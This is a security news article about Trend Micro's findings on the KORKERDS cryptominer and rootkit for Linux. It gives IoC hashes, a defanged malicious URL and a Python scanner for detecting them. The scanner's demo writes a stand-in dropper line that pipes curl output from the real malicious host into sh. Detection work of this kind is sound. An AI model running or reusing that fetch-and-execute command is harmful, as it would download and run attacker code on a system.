Linux Systems Are Affected By Malicious Crypto-Mining Malware: How To Detect It?

Trend Micro, a Japanese cybersecurity company, has published a report on its website stating that it has found malware targeting Linux systems.

The company's researchers noticed hidden cryptocurrency-mining activity on Linux systems that they found highly suspicious and started an investigation. They identified the miner, later named Coinminer.Linux.KORKERDS.AB, together with a rootkit component, Rootkit.Linux.KORKERDS.AA, which conceals the miner's activity so that the only visible symptom is degraded performance. The infection vector is still being investigated; the information available so far suggests that the malware is installed through a plugin or bundled with downloaded software. Further technical details are given in the report.

The company explains:

“This makes it difficult to detect, as infected systems will only indicate performance issues. The malware is also capable of updating and upgrading itself and its configuration file.”

It is worth noting that operating systems such as macOS and Linux are widely regarded as secure because installing software normally requires the user to grant administrator privileges, so a file cannot simply be dropped onto the system without the user's consent. In this case the malicious miner appears to arrive bundled with a plugin: the user installs the plugin with administrator rights, and the malware inherits those rights, which is all it needs to install its rootkit and start mining.

Trend Micro provided the following Indicators of Compromise (IoCs) so that users can check whether their systems are affected. (Editor's Note: an indicator of compromise (IoC) is an artifact observed on a network or in an operating system that indicates, with high confidence, a computer intrusion. Typical IoCs are virus signatures, IP addresses, MD5 hashes of malware files, or URLs and domain names of botnet command-and-control servers. Source: https://en.wikipedia.org/ )

Related hashes (SHA-256):

  • cdd921a5de5d5fffc51f8c9140afa9d23f3736e591fce3f2a1b959d02ab4275e (Trojan.Linux.DLOADER.THAOOAAK)
  • baf93d22c9d1ae6954942704928aeeacbf55f22c800501abcdbacfbb3b2ddedf (Coinminer.Linux.KORKERDS.AB)
  • 0179fd8449095ac2968d50c23d37f11498cc7b5b66b94c03b7671109f78e5772 (Coinminer.Linux.KORKERDS.AA)
  • 023c1094fb0e46d13e4b1f81f1b80354daa0762640cb73b5fdf5d35fcc697960 (Rootkit.Linux.KORKERDS.AA)

Related malicious URL:

  • hxxps://monero[.]minerxmr[.]ru/1/1535595427x-1404817712[.]jpg
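The hashes and the URL above are only useful if you actually check a system against them. The following script is an added example, not code from Trend Micro or from the original article: it walks a directory tree, streams every regular file once to compute its SHA-256 and to look for the published hostname inside the file (the defanged `[.]` is refanged only for the hostname), and reports any file whose hash matches one of the four samples or whose contents reference the download host. The sample directory it builds with `build_demo_tree()` is constructed for the demonstration and contains no real malware; the hostname search across chunk boundaries and the hash list are the only parts taken from the IoCs on this page.

```python
import hashlib
import os
import tempfile

# SHA-256 hashes from Trend Micro's IoC list above, keyed to the detection names given there.
KORKERDS_IOC_HASHES = {
    "cdd921a5de5d5fffc51f8c9140afa9d23f3736e591fce3f2a1b959d02ab4275e": "Trojan.Linux.DLOADER.THAOOAAK",
    "baf93d22c9d1ae6954942704928aeeacbf55f22c800501abcdbacfbb3b2ddedf": "Coinminer.Linux.KORKERDS.AB",
    "0179fd8449095ac2968d50c23d37f11498cc7b5b66b94c03b7671109f78e5772": "Coinminer.Linux.KORKERDS.AA",
    "023c1094fb0e46d13e4b1f81f1b80354daa0762640cb73b5fdf5d35fcc697960": "Rootkit.Linux.KORKERDS.AA",
}

# The URL IoC is published defanged ("[.]"); refang only the hostname, which is
# what a dropper script or config file on disk would actually contain.
IOC_HOSTS = ("monero[.]minerxmr[.]ru".replace("[.]", "."),)


def inspect_file(path, hosts=IOC_HOSTS, chunk=1 << 20):
    """Stream a file once: return (sha256 hex digest, set of IoC hostnames found in it).

    The content search carries the last len(needle)-1 bytes of the previous chunk
    forward, so a hostname split across a chunk boundary is still detected.
    """
    needles = [h.encode() for h in hosts]
    keep = max((len(n) for n in needles), default=1) - 1
    digest = hashlib.sha256()
    found = set()
    tail = b""
    with open(path, "rb") as f:
        while True:
            data = f.read(chunk)
            if not data:
                break
            digest.update(data)
            window = tail + data
            for n in needles:
                if n in window:
                    found.add(n.decode())
            tail = window[-keep:] if keep > 0 else b""
    return digest.hexdigest(), found


def sha256_file(path):
    """Hash only, no content search."""
    return inspect_file(path, hosts=())[0]


def scan_tree(root, hashes=KORKERDS_IOC_HASHES, hosts=IOC_HOSTS):
    """Walk `root` and return a list of hits as (path, reason, detail) tuples.

    reason is "hash" (file matches a published sample hash; detail is the detection
    name) or "url" (file contents reference the published download host; detail is
    the hostname). Symlinks and unreadable files are skipped.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                digest, seen = inspect_file(path, hosts)
            except OSError:
                continue
            if digest in hashes:
                hits.append((path, "hash", hashes[digest]))
            for host in sorted(seen):
                hits.append((path, "url", host))
    return hits


def build_demo_tree():
    """Create a throwaway directory with constructed sample files (not real malware)."""
    root = tempfile.mkdtemp(prefix="korkerds_demo_")
    os.makedirs(os.path.join(root, ".cache"))
    benign = os.path.join(root, "notes.txt")
    dropper = os.path.join(root, ".cache", "update.sh")
    with open(benign, "wb") as f:
        f.write(b"meeting at 10, nothing suspicious here\n")
    with open(dropper, "wb") as f:
        # Constructed stand-in for a downloader line that references the IoC host.
        f.write(b"#!/bin/sh\ncurl -s https://monero.minerxmr.ru/1/x.jpg | sh\n")
    return root, {"benign": benign, "dropper": dropper}


if __name__ == "__main__":
    demo_root, _ = build_demo_tree()
    for path, reason, detail in scan_tree(demo_root):
        print(f"{reason:4} {detail:32} {path}")
```

On a real machine run `scan_tree("/")` as root, ideally from a rescue or live medium rather than from the running system: the malware ships a rootkit, so a scan performed on the infected host may be blinded to the very files and processes it is looking for. Two caveats on interpreting the result: a hash match is strong evidence, but the miner updates itself, so a modified copy will not match the published hashes, and a clean scan therefore does not prove the system is clean; a hostname match in a file is a lead to examine, not by itself proof of infection.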

We want to remind you that no matter how secure you believe your computer to be, it may still be compromised by professional crypto-hackers. Therefore, if you find a suspicious file or plugin, read the following article or consult a service centre.

What Is Hidden Mining, Why Is It Dangerous and How to Delete the Virus?
